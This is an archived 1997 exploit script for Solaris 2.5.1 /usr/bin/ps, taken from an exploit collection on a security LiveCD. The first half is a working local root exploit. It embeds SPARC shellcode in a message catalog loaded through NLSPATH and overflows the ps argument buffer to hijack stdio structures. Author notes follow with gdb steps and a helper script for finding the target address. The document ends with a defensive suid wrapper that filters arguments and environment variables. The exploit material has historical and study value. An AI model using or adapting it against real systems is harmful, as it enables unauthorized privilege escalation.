home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / local / solps.sh < prev    next >
Text File  |  2005-02-12  |  19KB  |  387 lines

  1.  
  2.                     #!/bin/sh
  3.                     #
  4.                     # Exploit for Solaris 2.5.1 /usr/bin/ps
  5.                     # J. Zbiciak, 5/18/97
  6.                     #
  7.  
  8.                     # change as appropriate
  9.                     CC=gcc
  10.  
  11.                     # Build the "replacement message" :-)
  12.                     cat > ps_expl.po << E_O_F
  13.                     domain "SUNW_OST_OSCMD"
  14.                     msgid "usage: %s\n%s\n%s\n%s\n%s\n%s\n%s\n"
  15.                     msgstr "\055\013\330\232\254\025\241\156\057\013\332\334\256\025\343\150\220\013\200\016\222\003\240\014\224\032\200\012\234\003\240\024\354\073\277\354\300\043\277\364\334\043\277\370\300\043\277\374\202\020\040\073\221\320\040\010\220\033\300\017\202\020\040\001\221\320\040\010"
  16.                     E_O_F
  17.  
  18.                     msgfmt -o /tmp/foo ps_expl.po
  19.  
  20.                     # Build the C portion of the exploit
  21.                     cat > ps_expl.c << E_O_F
  22.  
  23.                     /*****************************************/
  24.                     /* Exploit for Solaris 2.5.1 /usr/bin/ps */
  25.                     /* J. Zbiciak,  5/18/97                  */
  26.                     /*****************************************/
  27.                     #include <stdio.h>
  28.                     #include <stdlib.h>
  29.                     #include <sys/types.h>
  30.                     #include <unistd.h>
  31.  
  32.                     #define BUF_LENGTH      (632)
  33.                     #define EXTRA           (256)
  34.  
  35.                     int main(int argc, char *argv[])
  36.                     {
  37.                             char buf[BUF_LENGTH + EXTRA];
  38.                                           /* ps will grok this file for the exploit code */
  39.                             char *envp[]={"NLSPATH=/tmp/foo",0};
  40.                             u_long *long_p;
  41.                             u_char *char_p;
  42.                                             /* This will vary depending on your libc */
  43.                             u_long proc_link=0xef70ef70;
  44.                             int i;
  45.  
  46.                             long_p = (u_long *) buf;
  47.  
  48.                             /* This first loop smashes the target buffer for optargs */
  49.                             for (i = 0; i < (96) / sizeof(u_long); i++)
  50.                                     *long_p++ = 0x10101010;
  51.  
  52.                             /* At offset 96 is the environ ptr -- be careful not to mess it up */
  53.                             *long_p++=0xeffffcb0;
  54.                             *long_p++=0xffffffff;
  55.  
  56.                             /* After that is the _ctype table.  Filling with 0x10101010 marks the
  57.                                entire character set as being "uppercase printable". */
  58.                             for (i = 0; i < (BUF_LENGTH-104) / sizeof(u_long); i++)
  59.                                     *long_p++ = 0x10101010;
  60.  
  61.                             /* build up _iob[0]  (Ref: /usr/include/stdio.h, struct FILE) */
  62.                             *long_p++ = 0xFFFFFFFF;   /* num chars in buffer */
  63.                             *long_p++ = proc_link;    /* pointer to chars in buffer */
  64.                             *long_p++ = proc_link;    /* pointer to buffer */
  65.                             *long_p++ = 0x0501FFFF;   /* unbuffered output on stream 1 */
  66.                             /* Note: "stdin" is marked as an output stream.  Don't sweat it. :-) */
  67.  
  68.                             /* build up _iob[1] */
  69.                             *long_p++ = 0xFFFFFFFF;   /* num chars in buffer */
  70.                             *long_p++ = proc_link;    /* pointer to chars in buffer */
  71.                             *long_p++ = proc_link;    /* pointer to buffer */
  72.                             *long_p++ = 0x4201FFFF;   /* line-buffered output on stream 1 */
  73.  
  74.                             /* build up _iob[2] */
  75.                             *long_p++ = 0xFFFFFFFF;   /* num chars in buffer */
  76.                             *long_p++ = proc_link;    /* pointer to chars in buffer */
  77.                             *long_p++ = proc_link;    /* pointer to buffer */
  78.                             *long_p++ = 0x4202FFFF;   /* line-buffered output on stream 2 */
  79.  
  80.                             *long_p =0;
  81.  
  82.                             /* The following includes the invalid argument '-z' to force the
  83.                                usage msg to appear after the arguments have been parsed. */
  84.                             execle("/usr/bin/ps", "ps", "-z", "-u", buf, (char *) 0, envp);
  85.                             perror("execle failed");
  86.  
  87.                             return 0;
  88.                     }
  89.                     E_O_F
  90.  
  91.                     # Compile it
  92.                     $CC -o ps_expl ps_expl.c
  93.  
  94.                     # And off we go!
  95.                     exec ./ps_expl
  96.  
  97.  
  98.  
  99.  
  100.  
  101.  
  102.  
  103.                     ===========================================================================
  104.  
  105.  
  106.  
  107.  
  108.                     A number of you have written saying that the exploit doesn't work.
  109.                     The biggest problem is that the exploit relies on a very specific
  110.                     address (which I put in the proc_link variable) in order to work.
  111.  
  112.                     (Incidentally, as some have noted, there was a stray '*' in one of
  113.                     the versions I sent out which causes some warnings to be generated.
  114.                     Change "u_long *proc_link=..." to "u_long proc_link=..." if this
  115.                     bothers you.  The warnings are benign in this case.)
  116.  
  117.                     The following shortcut seems to work for finding the value for
  118.                     the bothersome proc_link variable.  You don't need to be a gdb whiz
  119.                     to do this:
  120.  
  121.                     $ gdb ./ps
  122.                     GDB is free software and you are welcome to distribute copies of it
  123.                      under certain conditions; type "show copying" to see the conditions.
  124.                     There is absolutely no warranty for GDB; type "show warranty" for details.
  125.                     GDB 4.16 (sparc-sun-solaris2.4),
  126.                     Copyright 1996 Free Software Foundation, Inc...(no debugging symbols found)...
  127.                     (gdb) break exit
  128.                     Breakpoint 1 at 0x25244
  129.                     (gdb) run
  130.                     Starting program: /home3/student/im14u2c/c/./ps
  131.                     (no debugging symbols found)...(no debugging symbols found)...
  132.                     (no debugging symbols found)...Breakpoint 1 at 0xef7545c0
  133.                     (no debugging symbols found)...   PID TTY      TIME CMD
  134.                       9840 pts/27   0:01 ps
  135.                      19499 pts/27   0:10 bash
  136.                       9830 pts/27   0:02 gdb
  137.  
  138.                     Breakpoint 1, 0xef7545c0 in exit ()
  139.                     (gdb) disassemble exit
  140.                     Dump of assembler code for function exit:
  141.                     0xef7545c0 <exit>:      call  0xef771408 <_PROCEDURE_LINKAGE_TABLE_+7188>
  142.                     0xef7545c4 <exit+4>:    nop
  143.                     0xef7545c8 <exit+8>:    mov  1, %g1
  144.                     0xef7545cc <exit+12>:   ta  8
  145.                     End of assembler dump.
  146.                     (gdb)
  147.  
  148.                     The magic number is in the "call" above: 0xef771408.
  149.  
  150.                     For the extremely lazy, the following shell script worked for me to
  151.                     extract this value from the noise.  Your Mileage May Vary.
  152.  
  153.                     --- extract_proc_link.sh
  154.                     #!/bin/sh
  155.  
  156.                     cp /usr/bin/ps ./ps
  157.                     FOO="`cat << E_O_F | gdb ./ps | grep PROC | cut -d: -f2 | cut -d\< -f1
  158.                     break exit
  159.                     run
  160.                     disassemble exit
  161.                     quit
  162.                     y
  163.                     E_O_F
  164.                     `"
  165.  
  166.                     rm -f ./ps
  167.  
  168.                     set $FOO foo
  169.  
  170.                     [ -f "$1" = "foo" ] && echo "Try something else" && exit 1;
  171.  
  172.                     echo "  u_long proc_link=$2;"
  173.                     --- EOF
  174.  
  175.                     Note, this sets the proc_link variable to the routine "exit" calls, so
  176.                     you will probably get garbage on your screen when the exploit runs.
  177.                     Solution: To it from an xterm or something which lets you do a "reset"
  178.                     to nullify the action of the control characters in the exploit.
  179.  
  180.                     Incidentally, it appears that /usr/ucb/ps is equally succeptable to this
  181.                     hole, except the vulnerability is on the -t argument, and the string
  182.                     grokked by gettext is different, so the "ps_expl.po" file needs to be
  183.                     changed slightly.  Fortunately, "environ" and "proc_link" are pretty
  184.                     much the same.  (Use the "extract" script above on /usr/ucb/ps, etc.)
  185.  
  186.  
  187.  
  188.                     ============================================================================
  189.  
  190.  
  191.  
  192.  
  193.                     Here's a generic wrapper I've written that you can use as an interim
  194.                     solution for wrapping /usr/bin/ps and /usr/ucb/ps.  (/usr/ucb/ps looks
  195.                     to be similarly vulnerable.)  The code is fairly well documented IMHO,
  196.                     and should be adaptable enough to wrap just about any program.
  197.  
  198.                     This wrapper also filters environment variables, so if you have binaries
  199.                     which blindly trust certain variables (NLSPATH is a common one in Solaris),
  200.                     you can filter out those variables.  (You could also fairly trivially
  201.                     add in default values for some variables if you needed to, such as for
  202.                     NLSPATH.)
  203.  
  204.                     Finally, this wrapper will log exploit attempts to syslog if you configure
  205.                     that option.  The log facility, log priority, and log ident are all
  206.                     configurable with #defines.  I've currently set the code to LOG_ALERT
  207.                     on LOG_LOCAL0, with ident "wrapper".  To prevent problems with syslog,
  208.                     the wrapper even limits the number of characters it writes per log
  209.                     message.  (Note:  This limit is on the number of characters per message,
  210.                     not including the identifier, PID, etc.)
  211.  
  212.                     I make no guarantee or warranty about this code; it looks good/works fine
  213.                     for me.  :-)   If you have problems configuring this wrapper for a
  214.                     particular program, first read all the comments in the source, and then
  215.                     email me if you still can't figure it out.  :-)
  216.  
  217.                     Incidentally, it's safe to leave ps lying around without the suid-bit;
  218.                     it'll happily list the calling user's own processes, and those processes
  219.                     alone.  That's one of the wonderful advantages of a /proc based ps.  :-)
  220.  
  221.                     --- wrapper.c
  222.  
  223.                     /*****************************************************************/
  224.                     /* Generic wrapper to prevent exploitation of suid/sgid programs */
  225.                     /* J. Zbiciak, 5/19/97                                           */
  226.                     /*****************************************************************/
  227.  
  228.                     #include <stdio.h>
  229.                     #include <syslog.h>
  230.                     #include <strings.h>
  231.                     #include <unistd.h>
  232.                     #include <errno.h>
  233.  
  234.                     static char rcsid[]="$Id: solps.sh,v 1.1.1.1 2005/02/12 19:52:34 loni Exp $";
  235.  
  236.                     /**************************************************************************/
  237.                     /* To install, move wrapped executable to a different file name.  (I like */
  238.                     /* just appending an underscore '_' to the filename.)  Then, remove the   */
  239.                     /* offending permission bit.  Finally, place this program in the wrapped  */
  240.                     /* program's place with the appropriate permissions.   Enjoy!             */
  241.                     /**************************************************************************/
  242.  
  243.                     /* Tunable values per program being wrapped                               */
  244.                     #define WRAPPED "/usr/bin/ps"   /* Set to full path of wrapped executable */
  245.                     #define REALBIN WRAPPED"_"      /* Usually can be left untouched.         */
  246.                     #define MAX_ARG (32)            /* Maximum argv parameter length.         */
  247.                     #define SYSLOG 1                /* Enable/disable SYSLOGging              */
  248.                     #define FACILITY LOG_LOCAL0     /* Facility to syslog() to                */
  249.                     #define PRIORITY LOG_ALERT      /* Priority level for syslog()            */
  250.                     #define LOGIDENT "wrapper"      /* How to identify myself to syslog()     */
  251.  
  252.                     typedef struct tEnvInfo
  253.                     {
  254.                             char * env;             /* Environment var name with trailing '=' */
  255.                             int name_len;           /* Length of name (including '=')         */
  256.                             int max_len;            /* Max length of value assignable to var  */
  257.                     } TEnvInfo;
  258.  
  259.                     /* aside:  trailing '=' is necessary to prevent problems with variables   */
  260.                     /*         whose names prefix each other.                                 */
  261.  
  262.                     TEnvInfo allowed_env [] =       /* Environ. vars we allow program to see  */
  263.                     {
  264.                             { "COLUMNS=",           8,      4  },
  265.                             { "LC_CTYPE=",          9,      64 },
  266.                             { "LC_MESSAGES=",       11,     64 },
  267.                             { "LC_TIME=",           8,      64 },
  268.                             { "LOGNAME=",           8,      16 },
  269.                             { "TERM=",              5,      16 },
  270.                             { "USER=",              5,      16 },
  271.                     };
  272.                     #define NUM_ALLOWED_ENV (sizeof(allowed_env)/sizeof(TEnvInfo))
  273.  
  274.                     /* Internal use only -- shouldn't need to adjust, usually                */
  275.                     #define MSG_LEN (192)          /* Maximum output message length.         */
  276.                     #define MAX_LOG (64)           /* Maximum length per call to syslog()    */
  277.  
  278.                     #ifndef SYSLOG
  279.                     #error Define "SYSLOG" to be either 1 or 0 explicitly
  280.                     #endif
  281.  
  282.                     /* No user serviceable parts inside (End of configurable options)        */
  283.  
  284.                     /* Log a message to syslog, and abort */
  285.                     void log(char * s)
  286.                     {
  287.                     #if SYSLOG
  288.                         char buf[MAX_LOG];
  289.                         int l;
  290.  
  291.                         l=strlen(s);
  292.  
  293.                         /* Open up syslog; use "Local0" facility */
  294.                         openlog(LOGIDENT "[" WRAPPED "]",LOG_PID,FACILITY);
  295.  
  296.                         do {
  297.                             strncpy(buf,s,MAX_LOG-1);
  298.                             buf[MAX_LOG-1]=0;
  299.                             syslog (PRIORITY,buf);
  300.                             l-=64;
  301.                             if (l>0) s+=MAX_LOG-1;
  302.                         } while (l>0);
  303.  
  304.                         closelog();
  305.                     #endif
  306.  
  307.                         exit(1);
  308.                     }
  309.  
  310.                     /* The main event */
  311.                     int main(int argc, char * argv[], char *envp[])
  312.                     {
  313.                         int i,j,k;
  314.                         char buf[MSG_LEN];
  315.  
  316.                         /* Check all of argv.  Log and exit if any args have length > MAX_ARG */
  317.                         for (i=0;i<argc && argv[i]!=0;i++)
  318.                         {
  319.                             if (strlen(argv[i])>MAX_ARG)
  320.                             {
  321.                                 printf("Error: Aborting!\n"
  322.                                        " Excessive commandline argument length: '%s'\n", argv[i]);
  323.                                 /* Safe since uid/gid etc. are max 5 chars apiece */
  324.                                 sprintf(buf,
  325.                                     "Attempted overrun (argv): "
  326.                                     "uid=%.5d gid=%.5d euid=%.5d egid=%.5d\n",
  327.                                     (int)getuid(),(int)getgid(),(int)geteuid(),(int)getegid());
  328.                                 log(buf);
  329.                                 exit(1);  /* safety net */
  330.                             }
  331.                         }
  332.  
  333.                         /* Check all of envp.  Throw out any environment variables which
  334.                            aren't in "allowed_env[]".  If any variables permitted by
  335.                            "allowed_env[]" are too long, log and exit. */
  336.  
  337.                         for (i=j=0; envp[i]!=0; i++)
  338.                         {
  339.                             for (k=0;k<NUM_ALLOWED_ENV;k++)
  340.                             {
  341.                                 if (strncmp(envp[i],
  342.                                             allowed_env[k].env,
  343.                                             allowed_env[k].name_len)==0)
  344.                                     break;
  345.                             }
  346.                             if (k!=NUM_ALLOWED_ENV)
  347.                             {
  348.                                 if (strlen(envp[i]) >
  349.                                     allowed_env[k].max_len+allowed_env[k].name_len)
  350.                                 {
  351.                                     printf("Error: Aborting!\n"
  352.                                             " Excessive environment variable length: '%s'\n",
  353.                                             envp[i]);
  354.                                     /* Safe because we have control over allowed_env[] */
  355.                                     sprintf(buf,
  356.                                         "Attempted overrun (env var '%s'): "
  357.                                         "uid=%.5d gid=%.5d euid=%.5d egid=%.5d\n",
  358.                                         allowed_env[k].env,
  359.                                         (int)getuid(),(int)getgid(),(int)geteuid(),(int)getegid());
  360.                                     log(buf);
  361.                                     exit(1);  /* safety net */
  362.                                 }
  363.                                 envp[j++]=envp[i];
  364.                             }
  365.                             if (j>NUM_ALLOWED_ENV)
  366.                             {
  367.                                 log("Internal error to wrapper -- too many allowed env vars");
  368.                                 exit(1);  /* safety net */
  369.                             }
  370.                         }
  371.                         envp[j]=0;
  372.  
  373.                         /* If we make it this far, we're good to go. */
  374.                         argv[0]=WRAPPED;
  375.                         execve(REALBIN, argv, envp);
  376.  
  377.                         /* Safe, because errno number is very few chars */
  378.                         sprintf(buf, "execve failed!  errno=%.5d\n",errno);
  379.                         perror("execve() failed");
  380.                         log(buf);
  381.  
  382.                         exit(1); /* safety net */
  383.  
  384.                     }
  385.  
  386.                     --- EOF
  387.